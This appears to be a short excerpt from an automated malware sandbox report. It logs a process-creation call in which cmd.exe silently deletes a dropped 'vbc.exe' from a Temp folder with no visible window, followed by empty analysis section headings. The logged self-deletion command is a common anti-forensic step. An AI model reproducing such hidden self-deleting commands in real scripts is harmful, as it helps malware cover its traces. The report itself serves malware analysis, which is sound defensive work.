CreateProcessInternalW June 21, 2021, 5:20 p.m.	thread_identifier: 6744 thread_handle: 0x000000c4 process_identifier: 8772 current_directory: filepath: C:\Windows\SysWOW64\cmd.exe track: 1 command_line: /c del "C:\Users\test22\AppData\Local\Temp\vbc.exe" filepath_r: C:\Windows\SysWOW64\cmd.exe stack_pivoted: 0 creation_flags: 134217728 (CREATE_NO_WINDOW) inherit_handles: 1 process_handle: 0x00000110	1	1

vbc.exe

Process Tree Toggle all

Network Toggle all

Suricata Toggle all

Suricata Alerts

Suricata TLS

Signatures Toggle All